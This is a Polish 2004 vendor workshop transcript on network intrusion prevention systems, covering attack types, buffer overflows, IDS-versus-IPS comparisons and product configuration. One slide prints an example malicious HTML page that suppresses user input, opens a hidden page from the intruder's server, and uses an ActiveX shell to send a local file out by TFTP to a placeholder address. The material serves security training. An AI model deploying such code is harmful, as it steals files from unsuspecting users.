Skuteczne zapobieganie włamaniom Intrusion Prevention Systems

Transkrypt

1 PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Skuteczne zapobieganie włamaniom Intrusion Prevention Systems WARSZTATY ZABEZPIECZEŃ Opracował: Mariusz Stawowski Check Point Certified Security Expert Plus NetScreen Certified Security Professional CLICO Sp. z o.o., Al. 3-go Maja 7, Kraków; Tel: ; ; Fax: ; support@clico.pl, orders@clico.pl.; Ftp.clico.pl.;

2 Program warsztatów: 1. Techniki ataku stosowane przez intruzów i metody ochrony. 2. Przegląd dostępnych na rynku rozwiązań zabezpieczeń IPS (m.in. Check Point, ISS, Juniper NetScreen). 3. Projektowanie zabezpieczeń przed atakami intruzów (Network-Host IPS). 4. Konfiguracja systemów Network IPS. 5. Dostrajanie zabezpieczeń IPS i praktyczna ocena ich skuteczności na wykonywane ataki (m.in. włamania przez Exploit, ataki DoS). 6. Zarządzanie bezpieczeństwem w systemach Network IPS (m.in. Check Point SmartDashboard, ISS SiteProtector, Juniper NetScreen-IDP Manager). System zabezpieczeń Network IPS blokuje pakiety, w których wykryty został złośliwy kod (np. exploit, DoS, shellcode) i nie dopuszcza aby dotarły one do chronionych zasobów systemu informatycznego 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 2

3 1. Techniki ataku stosowane przez intruzów i metody ochrony Zasoby systemu informatycznego narażone są na wiele, różnego rodzaju niebezpieczeństw, najczęściej wynikających z globalnego charakteru oraz dużego skomplikowania środowiska sieci komputerowych (np. Internet, intranet, ekstranet). Ogólna klasyfikacja zagrożeń: 1. Ataki sieciowe (np. włamania i penetracje, ataki DoS) 2. Zagrożenia transmisji danych (np. podsłuch sieciowy, przechwytywanie sesji) 3. Zagrożenia aplikacyjne (np. wirusy, robaki, konie trojańskie) 4. Zagrożenia kryptograficzne (np. nieaktualne, bądź zagubione klucze szyfrowania) 5. Przeciek informacji (np. informacje o klauzuli tajności Tajne są dostępne dla systemu komputerowego o klauzuli Jawne) 6. Zagrożenia komunikacyjne (np. przeciążenia sieci, niewłaściwy ruting sieci) 7. Awarie techniczne (np. awaria sprzętu, błąd oprogramowania) 8. Błędy ludzi (np. błędy użytkowników, administratorów) 9. Zagrożenie fizyczne (np. kradzież, pożar, zalanie) 10. Ulot elektromagnetyczny Zagrożenia systemów komputerowych najczęściej kojarzone są z tzw. wtargnięciami (ang. intrusion). Pod tym pojęciem rozumiane są wszelkie działania, które spowodowały naruszenie integralności, poufności lub dostępności zasobów systemu komputerowego (danych, usług). Można wyróżnić następujące podstawowe kategorie wtargnięć: włamanie (ang. break-in) przejęcie i wykorzystanie konta i zasobów użytkownika systemu komputerowego lub administratora, odmowa usługi (ang. denial of service) obniżenie lub całkowite zablokowanie dostępności zasobów i usług systemu komputerowego, złośliwe użytkowanie (ang. maliciouse use) wykorzystywanie zasobów i usług systemu komputerowego niezgodnie z zasadami prawidłowego użytkowania (np. w celu naruszenia integralności i autentyczności danych), przeciek (ang. leakage) niekontrolowany wypływ informacji z systemu komputerowego (np. dokument o klauzuli Tajne został przesyłany do sieci publicznej), maskarada (ang. masquerade) podszywanie się pod innego, zwykle bardziej uprzywilejowanego użytkownika systemu komputerowego, penetracja (ang. penetration) nieupoważnione rozpoznawanie zabezpieczeń systemu komputerowego (np. w celu znalezienia słabych punktów, poprzez które można przeprowadzić włamanie), podsłuch sieciowy (ang. network sniffing) - rejestrowanie informacji przesyłanych za pośrednictwem sieci, przechwytywanie połączeń sieciowych (ang. connection hijacking) przejmowanie zainicjowanych połączeń klient-serwer (tzn. intruz będący na drodze komunikacji sieciowej przejmuje kontrolę nad połączeniem i zaczyna działać w imieniu klienta lub serwera aplikacji) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 3

4 Podsłuch sieciowy może być prowadzony za pomocą dedykowanych urządzeń podsłuchowych, podłączonych do sieci na drodze transmisji danych lub przy użyciu zwykłych komputerów wyposażonych w odpowiednie oprogramowanie, które selektywnie odczytuje pakiety danych (np. Network Monitor w Windows NT/2000, Snoop w SUN Solaris). Wyróżnia się dwa rodzaje podsłuchu: pasywny (ang. passive sniffing) sniffer wprowadza kartę sieciową w tryb promiscous i analizuje wszystkie odczytane ramki sieci fizycznej, aktywny (ang. active sniffing) sniffer wykorzystuje technikę ARP Spoofing do przekierowania komunikacji sieciowej do swojego portu w przełączniku (ang. switch). Obecnie, oprócz technik kryptograficznych (m.in. VPN), nie ma skutecznych narzędzi przeciwdziałania zagrożeniom podsłuchu i przechwytywania połączeń. W sieciach LAN stosując przełączniki zamiast zwykłych koncentratorów (ang. hub) można zabezpieczyć się tylko przed podsłuchem pasywnym. Dostępne programy monitorujące pracę sieci komputerowej nie gwarantują wykrycia dobrze zamaskowanego Sniffera. Okazuje się, iż nawet zastosowanie łącza światłowodowego, które do niedawna uznawane było za w pełni bezpieczne, nie zapewnia pełnej tajności transmitowanych informacji. Odrębną klasę zagrożeń związanych z podsłuchem stanowi tzw. promieniowanie ujawniające (określane także jako ulot elektromagnetyczny), czyli promieniowanie elektromagnetyczne emitowane przez sprzęt komputerowy (np. monitory, drukarki), które może być rejestrowane nawet ze znacznych odległości. Inny podział zagrożeń odnosi się do konkretnych technik stosowanych przez intruzów. Typowe zagrożenia z Internetu to exploits oraz (D)DoS. Pod pojęciem exploits rozumiane jest uzyskanie nieupoważnionego dostępu do systemu poprzez wykorzystanie podatności systemu (np. błędów oprogramowania, konfiguracji). Zagrożenia (D)DoS odnoszą się do zakłócania, bądź zablokowania usług systemu informatycznego, m.in.: Flooding wysyłanie dużej liczby pakietów (zapytań, danych), Smurfing zwielokrotnienie ataku Flooding poprzez użycie IP Broadcasts i IP Spoofing, IP Fragmentation Attacks wykorzystanie błędów implementacji stosu TCP/IP, SYN Flooding wysyłanie dużej liczby zapytań SYN w imieniu nie istniejącego klienta TCP (IP Spoofing), Nuking wysyłanie specjalnie spreparowanych pakietów ICMP i TCP w celu zamknięcia aktywnego połączenia sieciowego, specyficzne DoS wysyłanie zapytań blokujących usługi serwera sieciowego poprzez wykorzystanie specyficznych błędów tego serwera, DDoS zmasowane ataki DoS wykonywane przez wiele setek lub tysięcy specjalnie zaprogramowanych agentów CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 4

5 Kolejną klasę zagrożeń stanowią złośliwe aplikacje (ang. malicious programs). Ogólnie, pod tym pojęciem kryją się aplikacje stworzone z myślą o wyrządzeniu szkody w systemie komputerowym, w którym zostaną uruchomione. W tym gronie można wyróżnić następujące aplikacje: wirus (ang. virus) - program dopisujący się do innego programu, który atakuje system w trakcie uruchomienia swojego żywiciela, bakteria (ang. bacteria), królik (ang. rabbit) - program wielokrotnie kopiujący i uruchamiający swój własny kod, celem pełnego zagarnięcia zasobów komputera (czasu procesora, pamięci operacyjnej, przestrzeni dyskowej) i doprowadzenia do zablokowania systemu, koń trojański (ang. trojan horse) - program, który udaje pracę innego legalnego programu, a w międzyczasie wykonuje szereg niepożądanych czynności (np. fałszywy program Login lub Telnet przechwytuje hasło użytkownika), bomba czasowa (ang. time bomb), bomba logiczna (ang. logic bomb) - fragment programu podejmujący nietypowe działanie tylko w określonym czasie (np. w dniu urodzin autora programu) lub w momencie spełnienia ustalonych warunków, robak (ang. worm) - program, który powiela samego siebie, wykonuje ustalone czynności (najczęściej niekorzystne dla systemu) i próbuje samodzielnie przenieść się do innego komputera w sieci. Niebezpieczeństwo mogą stanowić także niektóre rozszerzenia języka opisu dokumentów hipertekstowych HTML (np. Java, ActiveX), wśród których szczególnie groźne może być ActiveX. Dołączane do stron WWW procedury ActiveX to programy wykonywalne posiadające duże uprawnienia w systemie operacyjnym komputera. Kolejną kategorią zagrożeń są furtki (ang. backdoors) lub włazy (ang. trapdoors), czyli nielegalne metody dostępu do systemu komputerowych. Mogą one zostać stworzone przez programistów (np. do celów testowania aplikacji), bądź intruzów, którzy dokonali włamania do systemu komputerowego. Jedną z najpowszechniej stosowanych technik oszukiwania zabezpieczeń systemów informatycznych jest Spoofing. Określenie Spoofing wywodzi się z dziedziny wojskowej i oznacza przeciwdziałanie elektronicznym przeciwsystemom nieprzyjaciela poprzez nadawanie fałszywych informacji. W odniesieniu do zagadnienia transmisji danych najbardziej popularny jest Source IP Address Spoofing, który polega na przesyłaniu pakietów zawierających sfałszowany adres źródłowy (ang. source address), tak aby komputer odbierający te pakiety błędnie identyfikował ich nadawcę. Najczęściej IP Spoofing wykonywany jest z obszaru sieci publicznej, skąd intruz wysyła pakiety danych w imieniu uprzywilejowanego komputera zlokalizowanego w atakowanej sieci prywatnej. Atak IP Spoofing można częściowo zablokować poprzez odpowiednio skonfigurowany filtr pakietów, który działając na ruterze lub firewall blokuje wszystkie pakiety napływające z sieci publicznej, które posiadają adres źródłowy z sieci prywatnej. Inne znane odmiany tej techniki to: DNS Spoofing, Port Spoofing, ARP Spoofing i Mail Spoofing CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 5

6 Typowe techniki włamań Intruzi stosują wiele różnych metod ataku. Można wyróżnić dwie uznawane za najgroźniejsze techniki włamań do systemów komputerowych: włamanie przez exploit polegające na bezpośrednim połączeniu intruza z atakowanym systemem i wykonaniu w nim niedozwolonych działań dzięki wykorzystaniu błędu jego aplikacji, włamanie przez agenta polegające na przesłaniu do systemu specjalnie napisanego programu, który po uruchomieniu wykonuje niedozwolone działania zaprogramowane przez intruza. Serwer Web Serwer DB (SQL) Internet 1/ Udane włamanie na serwer DMZ 2/ Atak na serwery w sieci wewnętrznej Firewall Sieć wewn. firmy Typowy scenariusz włamania do sieci Obserwowane w Internecie ataki zwykle rozpoczynają się od penetracji i przejęcia kontroli nad serwerem publicznym firmy (np. Web, SMTP). Serwery takie w większości firm znajdują się w wydzielonym segmencie sieci tzw. DMZ. Wykonanie włamania na serwer jest możliwe, gdy oprogramowanie tego serwera posiada błąd umożliwiający uruchamianie poleceń systemowych. Można w ten sposób skopiować na serwer aplikację typu Trojan (np. NetCat, NetBus, BO, SubSeven) i uruchomić ją w celu uzyskania zdalnego dostępu do systemu. Po przejęciu kontroli nad serwerem intruz może wykonywać na nim różnego rodzaju działania (np. Web graffiti) lub kontynuować atak na inne strefy bezpieczeństwa (np. sieć wewnętrzną). Taktyka przejmowania kontroli nad kolejnymi strefami bezpieczeństwa w sieci nosi nazwę Island Hopping Attack. Włamanie przez agenta polega na przesłaniu do sieci wewnętrznej firmy złośliwego kodu (ang. malicious code). Odbywa się to zwykle za pomocą ogólnie dostępnych usług sieciowych. Dla przykładu, pocztą elektroniczną można przesłać do określonego użytkownika kod JavaScript lub ActiveX jako zawartość wiadomości napisanej w języku HTML. W razie stosowania przez użytkownika nieaktualnej wersji klienta poczty lub przeglądarki Web, bądź też ich niewłaściwej konfiguracji (np. pozwalającej na wykonywanie bez ograniczeń aplikacji ActiveX) uruchomiony kod dokona skopiowania plików użytkownika, bądź innych niebezpiecznych działań. Kod uruchomiony przez klienta poczty na komputerze użytkownika może próbować wykonać niedozwolone operacje lub uruchomić przeglądarkę Web, która z komputera intruzami załaduje i uruchomi inny złośliwy kod. Poniżej przedstawiono przykładowy kod agenta CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 6

7 <html><body> Informacja dla uzytkownika. <script language="javascript"> <!-- // Zablokowanie prawego przycisku myszki. function A(e) { if (event.button==2) { alert("prosze czekac!") return false; } return true; } document.onmousedown=a; // --> </script> <script language="javascript"> <!-- // Zablokowanie przycisku ALT. function B() { if (event.keycode == 18 event.keycode == 115) alert("prosze jeszcze poczekac!") return false; } document.onkeydown =B; // --> </script> <script language="" javascript=""> <!-- // Otwarcie strony Web z serwera intruza i ukrycie jej. window.open(' if (window.blur) { window.focus(); } // --> </script> <script> // Przeslanie pliku na komputer intruza poprzez TFTP. a=new ActiveXObject("WSCript.Shell"); a.run("tftp -i <adres> PUT c:/katalog/plik plik"); alert("dziekuje za wspolprace!"); </script> </body></html> 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 7

8 Najczęściej stosowaną metodą w atakach exploit jest przepełnienie bufora (ang. buffer overflow). Technika polega na zapisaniu do bufora aplikacji dużej wielkości danych tak, aby nastąpiło jego przepełnienie i nadpisanie obszaru pamięci za buforem. Zwykle aplikacja otrzymuje w tej sposób nowy kod do wykonania. Atak exploit polega na wprowadzeniu i wykonaniu złośliwego kodu. Z uwagi na rodzaj buforów wykorzystywanych w atakach wyróżnia się dwie techniki ataku - rozbijanie stosu (ang. stack smashing) oraz rozbijanie sterty (ang. heap smashing). Poprawne działanie aplikacji pamięć przydzielona aplikacji Atak exploit pamięć przydzielona aplikacji aplikacja kontroluje wielkość wprowadzanych danych do bufora bufor aplikacji wprowadzone dane wykraczają poza rozmiar bufora bufor aplikacji złośliwy kod adres powrotu adres powrotu Koncepcja ataku exploit poprzez przepełnienie bufora Aplikacja uruchomiona w komputerze ma do dyspozycji określony rozmiar pamięci, z której korzysta w trakcie wykonywania swoich funkcji (m.in. przetwarzania danych). Dane aplikacji są składowane w obszarach pamięci określanych jako bufory. W pamięci zapisany jest także adres, który określa gdzie aplikacja powinna przejść po zakończeniu bieżącej funkcji tzw. adres powrotu. Poprawnie napisana aplikacja kontroluje dane wprowadzane do bufora i nie pozwala na przekroczenie jego dopuszczalnego rozmiaru. Jeżeli jednak aplikacja nie jest właściwie napisana istnieje możliwość wprowadzenia danych przekraczających dopuszczalną wielkość bufora. Rysunek przedstawia koncepcję ataku exploit poprzez przepełnienie bufora. Intruz wprowadza do pamięci kod do wykonania (np. uruchomienie backdoor na określonym porcie TCP) i zmienia adres powrotu funkcji tak, aby kod został uruchomiony. W dalszej części opracowania zostaną przedstawione przykłady praktycznych implementacji zabezpieczeń przed tą kategorią ataków CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 8

9 Skuteczność systemów ochrony Atak przez exploit jest zwykle wykonywany w bardzo krótkim czasie. Jest to jednokrotne połączenie z serwerem i uruchomienie na nim złośliwego kodu. W praktyce za pomocą zabezpieczeń Sniffer IDS nawet zintegrowanych z systemem firewall (tzw. firewall signaling) nie ma możliwości blokowania ataków. Jedyne skuteczne w tym zakresie środki ochrony to Network IPS. Mimo pozornego podobieństwa Sniffer IDS zintegrowany z firewallem zachowuje się zupełnie inaczej jak Network IPS i w rzeczywistości stwarza większe zagrożenie niż korzyści. Różnicę tę najlepiej zrozumieć analizując popularne scenariusze włamań do systemów informatycznych. Zasady działania obu rozwiązań ochrony przedstawia rysunek. Porównanie skuteczności dedykowanego systemu Network IPS i Sniffer IDS zintegrowanego z firewallem można łatwo przeprowadzić nawet w warunkach prostej sieci lab. Internet/ WAN Internet/ WAN 1 Intruz wykonuje atak na zasoby syst. informatycznego 1 Intruz wykonuje atak na zasoby syst. informatycznego 6 Intruz uzyskuje dostęp do zasobów syst. informatycznego (np. poprzez backdoor używając innego adresu IP) Sniffer IDS 5 Firewall blokuje adres IP, z którego wykonano atak 4 2 Sniffer IDS wykrywa atak Sniffer IDS informuje firewall o ataku z określonego adresu IP 2 Network IPS wykrywa atak i blokuje pakiety, które wykonują ten atak Network IPS firewall 3 Intruz przejmuje kontrolę nad systemem i instaluje backdoor Porównanie działania Network IPS z działaniem Sniffer IDS zintegrowanego z firewallem 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 9

10 Tabela 1 przedstawia porównanie własności dedykowanego systemu zabezpieczeń Network IPS z systemem Sniffer IDS zintegrowanym z zewnętrznym firewallem. Tabela 1) Porównanie własności Sniffer IDS i Network IPS Zabezpieczenie Sniffer IDS zintegrowany z firewallem Network IPS Własności Ochrona zasobów systemu informatycznego przed atakami Wykrywalność ataków Zagrożenie zakłócania pracy systemu informatycznego Brak możliwości blokowania ataków i ochrony zasobów systemu informatycznego. Reakcja Sniffer IDS odbywa się po wykonaniu ataku. Typowy atak sieciowy to uruchomienie exploit typu przepełnienie bufora, załadowanie shellcode i instalacja backdoor. Czas trwania ataku jest bardzo krótki, a Sniffer IDS nie ma możliwości jego zablokowania poprzez wykonanie TCP Reset. Zablokowanie na firewallu adresu IP, z którego wykonano atak także jest nieskuteczne. Intruz może bowiem mając zainstalowany backdoor uzyskać dostęp do systemu używając innego adresu IP. Analiza ruchu sieciowego na zasadzie nasłuchu jest skomplikowana i istnieje zagrożenie gubienia pakietów. Sniffer-IDS ma utrudnione zadanie z uwagi na występujące w sieci przeciążenia, retransmisje TCP, fragmentację oraz różną kolejność napływających fragmentów datagramów. Na skutek tego zabezpieczenia Sniffer IDS charakteryzują się dużą liczbą fałszywych alarmów (ang. false positives) i nie wykrywają wszystkich ataków, nawet jeżeli posiadają w bazie ich sygnatury (patrz wyniki testów NSS Group - Blokowanie na firewall adresów IP, z których zostały zidentyfikowane przez Sniffer IDS ataki jest bardzo niebezpieczne (np. intruzi stosując IP Spoofing mogą wykonywać ataki używając adresów IP należących do oddziałów firmy, bądź jej klientów i partnerów. Atak jest blokowany przed uzyskaniem dostępu do chronionych zasobów systemu informatycznego. Network IPS blokuje pakiety, które wykonują atak. Network IPS w razie potrzeby realizuje także funkcje firewall. Network IPS analizuje całość ruchu sieciowego przepływającego przez urządzenie zabezpieczeń. Poprawne identyfikowanie ataków jest łatwiejsze jak w Sniffer IDS (m.in. w in-line nie ma zagrożenia zgubienia pakietów, Network IPS może wykonywać kompletowanie poddanych fragmentacji datagramów IP przed wpuszczeniem ich do sieci chronionej). Network IPS blokuje tylko pakiety wykonujące atak. Zagrożenie wprowadzania zakłóceń w pracy systemu informatycznego jest niewielkie CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 10

11 Oprócz włamań do systemów komputerowych wciąż duże niebezpieczeństwo stanowią podsłuch i przechwytywanie połączeń oraz ataki destrukcyjne i destabilizujące (D)DoS. Tabela 2 przedstawia podstawowe techniki ataków stosowane przez intruzów, metody ochrony i ich skuteczność. Tabela 2) Zagrożenia, zabezpieczenia i ich skuteczność ochrony Lp. Technika ataku Rodzaj zabezpieczeń Skuteczność ochrony 1. Włamanie przez exploit Network IPS Firewall Host IPS Wysoka Średnia (zależy od zabezpieczeń firewall i techniki exploit) Średnia Sniffer IDS (Network IDS) Niska 2. Włamanie przez agenta Kontrola zawartości (AV) Wysoka 3. Podsłuch i przechwytywanie połączeń 4. Ataki (D)DoS Szyfrowanie transmisji danych (VPN) Network IPS Firewall Host IPS Wysoka Wysoka Średnia (zależy od rodzaju firewall i techniki DoS) Średnia Sniffer IDS (Network IDS) Niska 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 11

12 Systemy IPS są w stanie skutecznie, w sposób aktywny przeciwstawiać się atakom intruzów funkcjonując w trybie in-line (patrz rysunek). Zasady działania Network IPS są podobne do systemów firewall. Ruch wchodzi do urządzenia IPS przez interfejs sieciowy i wewnątrz jest poddawany analizie, a następnie wychodzi z urządzenia innym interfejsem. Dzięki temu kontrola ruchu sieciowego jest łatwiejsza, pojawia się mniej jak w Sniffer IDS fałszywych alarmów i co najważniejsze całkowicie eliminowane jest zagrożenie, że IPS zgubi pakiety. Najistotniejsze jest jednak, że w trybie in-line ataki mogą być w czasie rzeczywistym blokowane przed ich dotarciem do chronionych zasobów systemu informatycznego. Rysunek 4 przedstawia zasady kontroli ruchu sieciowego w systemie zabezpieczeń NetScreen-IDP. Analiza ruchu sieciowego odbywa się w oparciu o różne techniki detekcji m.in. Stateful Signatures, Protocol Anomalies, Network Honeypot, Backdoor Detection, Traffic Anomalies, Spoofing Detection, Layer 2 Detection i Denial of Service Detection. Kompletowanie danych (m.in. składanie pakietów poddanych fragmentacji, eliminacja retransmisji) Normalizacja danych (m.in. translacja różnych formatów i systemów kodowania danych) Śledzenie połączeń, przepływu i strumieni (m.in. klient-serwer, serwer-klient, kanały sterowania i danych, negocjacje TCP) Wykrywanie i blokowanie ataków i innych niedozwolonych działań Zasady kontroli ruchu sieciowego w systemie zabezpieczeń NetScreen-IDP Inną klasę zagrożeń stanowią ataki exploit wykonywane poprzez sesje szyfrowane (np. sesje HTTPS w systemach e-commerce i e-banking). Zabezpieczenia sieciowe nie są w stanie poddawać kontroli tych sesji. Skuteczną metodą ochrony jest terminowanie sesji SSL na urządzeniach zabezpieczeń i wykonywanie kontroli na odszyfrowanych pakietach. Obecnie wiodącym dostawcą tej klasy rozwiązań na świecie jest izraelska firma Radware (wg raportu Gartner z 2003r.) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 12

13 2. Przegląd dostępnych na rynku rozwiązań zabezpieczeń IPS Zapewnienie właściwej ochrony przed zagrożeniami z sieci to obecnie podstawowe wymaganie bezpieczeństwa w systemach informatycznych. Pojawiają się coraz bardziej doskonalone techniki penetracji i włamań jak ataki hybrydowe oraz szybko rozprzestrzeniające się w sieci inteligentne robaki i Trojany. Zabezpieczenia starej generacji jak Network IDS (ang. intrusion detection system) działające na zasadach nasłuchu sieci (określane także jako Sniffer IDS), czy firewalle typu Stateful Inspection nie radzą sobie z tym zadaniem. Od systemów zabezpieczeń wymagane jest wykrywanie ataków i ich skuteczne blokowanie. Zabezpieczenia tej klasy określane są jako IPS (ang. intrusion prevention system). Pierwszą ich implementacją były systemy Host IPS. Nie przyjęły się one jednak w powszechnym zastosowaniu, ponieważ sprawiają problemy ze stabilnością pracy chronionych serwerów i w praktyce nie blokują wielu ataków. Oprogramowanie Host IPS jest bowiem instalowane bezpośrednio na serwerach i przez to stwarza ich dodatkowe obciążenie i może powodować zakłócenia pracy. Konieczne stało się opracowanie zabezpieczeń sieciowych, które potrafią wykrywać ataki i skutecznie powstrzymywać je w czasie rzeczywistym (tzn. blokować pakiety wykonujące atak przed ich dotarciem do chronionych systemów). W ostatnich latach na rynku pojawiła się nowa generacja zabezpieczeń IPS łącząca w sobie funkcje firewall i IDS, określana jako Network IPS, In-line IDS lub Deep Packet Inspection. Przykładami tych zabezpieczeń są Check Point with Application Intelligence, ISS Proventia G, NAI McAfee IntruShield oraz NetScreen Intrusion Detection and Prevention (IDP). W dalszej części opracowania zostaną przedstawione przykłady konfiguracji i praktyczne testy zabezpieczeń z wykorzystaniem NetScreen-IDP. System ten jest pierwszym na rynku dojrzałym rozwiązaniem tej klasy CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 13

14 Dostępne na rynku rozwiązania Network IPS zasadniczo nie różnią się pod względem wykrywalności ataków 1. Rozwiązania Network IPS ogromnie jednak różną się w odniesieniu do możliwości zarządzania bezpieczeństwem, m.in.: tworzenia i dostrajania polityki bezpieczeństwa, monitorowania bezpieczeństwa, analizy i wyjaśniania incydentów, wykrywania naruszeń bezpieczeństwa (np. zainstalowanych na serwerach Trojan-ów i Backdoor-ów, nielegalnie podłączonych komputerów). W obecnej sytuacji gdzie zdecydowana większość ataków wykonywana jest przez robaki internetowe, a nie ludzi zarządzanie bezpieczeństwem jest krytyczne. Podstawowe funkcje bezpieczeństwa realizowane przez system zabezpieczeń IPS są następujące: wykrywanie i blokowanie penetracji i ataków wykonywanych przez intruzów i robaki internetowe (tzn. aplikacje samodzielnie włamujące się do systemów komputerowych), monitorowanie stanu bezpieczeństwa (m.in. wykrywanie robaków działających na stacjach pracowników), wspomaganie administratorów w zakresie wyjaśniania zaistniałych naruszeń bezpieczeństwa. Dodatkowo, zaawansowane rozwiązania jak Juniper NetScreen IDP realizują następujące funkcje bezpieczeństwa: oszukiwanie intruzów poprzez techniki Network Honeypot, wykrywanie nieupoważnionych komputerów podłączonych do sieci wewnętrznej, nadzorowanie przestrzegania przez pracowników przyjętej polityki bezpieczeństwa (np. wykorzystywania niedozwolonych aplikacji), wykrywanie systemów i aplikacji podatnych na błędy bezpieczeństwa, wykrywanie sytuacji przełamania zabezpieczeń (m.in. identyfikowanie połączeń z Backdoor za pomocą technik analizy heurystycznej oraz nowo otwartych portów na serwerach specyficznych dla Trojanów i Backdoor). Zarządzanie bezpieczeństwem wymaga stosowania przez administratorów odpowiednich narzędzi zwłaszcza, jeżeli w systemie zabezpieczeń występuje wiele sensorów IPS. Dostępne produkty zabezpieczeń IPS oferują w tym zakresie różne narzędzia i różną funkcjonalność. Zasadniczo dostępne są graficzne konsole GUI (np. w systemach Check Point InterSpect, ISS SiteProtector i Juniper NetScreen-IDP) oraz konsole Web (np. w systemach NAI IntruShield i Radware DefensePro). 1 Testy jakości systemów Network IPS zostały wykonane m.in. przez NSS Group CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 14

15 3. Projektowanie zabezpieczeń przed atakami intruzów (Network-Host IPS) Network IPS jest elementem systemu zabezpieczeń sieciowych, który stanowi wzmocnienie i uzupełnienie innych środków bezpieczeństwa istniejących w systemie informatycznym (m.in. zabezpieczeń firewall, mechanizmów ochrony w systemach operacyjnych, bazach danych i aplikacjach). Przed wdrożeniem zabezpieczeń należy przeprowadzić specyfikację wymagań bezpieczeństwa (m.in. analizę ryzyka) i ustalić: 1. Które zasoby systemu informatycznego podlegają ochronie przed atakami (np. serwery w sieci wewnętrznej, serwery DMZ). 2. Jakie są istotne zagrożenia zasobów i gdzie znajdują się ich źródła (np. włamania i ataki DoS z Internetu, włamania z sieci oddziałowych). 3. Jaka powinna być reakcja zabezpieczeń na ataki (np. alarmowanie, blokowanie ataków). 4. Gdzie powinny być zlokalizowane zabezpieczenia (np. w strefie DMZ, przed firewallem, w sieci wewnętrznej). Kluczową rolę odgrywa lokalizacja zabezpieczeń. Network IPS może stanowić skuteczną ochronę przed atakami z sieci będąc na drodze pomiędzy chronionymi zasobami systemu informatycznego i źródłami zagrożenia (intruzami). Projektowanie zabezpieczeń w pierwszej kolejności koncentruje się na najbardziej wartościowych zasobach systemu informatycznego (tzn. systemach komputerowych realizujących, bądź wspomagających zadania biznesowe instytucji). Nie należy jednak ograniczać się tylko do ochrony najbardziej wartościowych zasobów. Projektowane zabezpieczenia sieci powinny bowiem stanowić skuteczną ochronę przed atakami prowadzonymi techniką Island Hopping Attack. Technika ta polega na zdobywaniu nieupoważnionego dostępu do słabiej zabezpieczonych systemów komputerowych (najczęściej nie posiadających dużego znaczenia dla instytucji), a następnie wykorzystywaniu ich jako podłoża do penetracji lepiej ochranianych, wartościowych elementów systemu informatycznego. Identyfikacja istotnych zagrożeń systemu informatycznego wykonywana jest m.in. na podstawie analizy sposobu połączenia systemu z sieciami zewnętrznymi, dostępnych protokołów i usług sieci zewnętrznych, protokołów i usług świadczonych dla sieci zewnętrznych, usług i zasobów dostępnych dla użytkowników, a także metod współdziałania systemów zlokalizowanych w obszarach sieci o różnym poziomie zaufania (np. strefy DMZ i sieci wewnętrznej) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 15

16 4. Konfiguracja systemów Network IPS Check Point InterSpect Konfiguracja InterSpect rozpoczyna się od ustalenia trybu pracy urządzenia. Urządzenie może pracować jako Router (posiada adresy IP na interfejsach i wykonuje ruting), Bridge (działa transparentnie i dzieli sieć na strefy bezpieczeństwa) oraz Switch (działa transparentnie bez podziału sieci na strefy bezpieczeństwa). W konsoli SmartDashboard wprowadzamy ustawienia polityki bezpieczeństwa InterSpect. Ustawienia wprowadzane są globalnie dla całości systemu zabezpieczeń CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 16

17 Juniper NetScreen-IDP Konsola zarządzania Juniper NetScreen-IDP udostępnia w jednym miejscu ustawienia konfiguracji zabezpieczeń IPS oraz polityki bezpieczeństwa (jedna lub wiele polityk). Administrator zabezpieczeń może w skali całego przedsiębiorstwa zdefiniować jedną polityka bezpieczeństwa obejmującą wszystkie segmenty sieci. Dodatkowo, za pomocą Violation Objects Manager administrator zabezpieczeń IDP ma możliwość zdefiniowania zasad normalnej pracy systemu informatycznego i otrzymywania alarmów o naruszeniach przyjętej polityki bezpieczeństwa firmy (np. wykorzystywanie przez określonych pracowników niedozwolonych aplikacji). Konfiguracja i śledzenie zmian w systemie informatycznym odbywa się za pomocą narzędzi Enterprise Security Profiler (m.in. wykrywanie zainstalowanych Trojanów, wykrywanie nieupoważnionych komputerów podłączonych do sieci wewnętrznej, itd.) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 17

18 Polityka bezpieczeństwa IDP składa się ze zbioru reguł opisujących zasady funkcjonowania zabezpieczeń. Reguły definiowane są za pomocą graficznego edytora Policy Editor. Edytor polityki bezpieczeństwa zawiera pięć sekcji: Main podstawowe zasady monitorowania sieci, wykrywania działań niedozwolonych i podejrzanych oraz eliminowania ataków, Backdoor Detection analiza ruchu sieciowego (m.in. badanie heurystyczne) pod kątem wykrywania interakcyjnych sesji, wskazujących na istnienie aplikacji typu Trojan lub Backdoor, Network Honeypot prezentowanie nieprawdziwych informacji na temat usług systemu informatycznego w razie wykrycia nieupoważnionych prób dostępu, SYN-Protector ochrona serwerów przed atakami Syn Flood, Traffic Anomalies - wykrywanie podejrzanych działań w sieci (np. skanowanie portów TCP i UDP). Administrator definiując reguły kontroli ruchu sieciowego może wybrać tryb konfiguracji Basic, zawierający tylko podstawowe ustawienia lub Advanced, bardziej szczegółowo określający działanie IDP (View Main Rulebase). Jaki ruch sieciowy podlega inspekcji? Czego należy szukać (m.in. jakich rodzajów ataków)? Jakie działania należy podejmować w razie wykrycia zdarzenia? Uwaga: Włączona opcja Terminal w regule polityki bezpieczeństwa w sekcji Main oznacza, że w razie wykrycia ataku w określonej komunikacji nie jest ona poddawana analizie względem kolejnych reguł (tzn. IDP wykonuje ustaloną w regule akcję i nie sprawdza następnych reguł). W innych sekcjach polityki bezpieczeństwa (Backdoor Detection, itd.) reguły posiadają na stałe włączony mechanizm Terminal CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 18

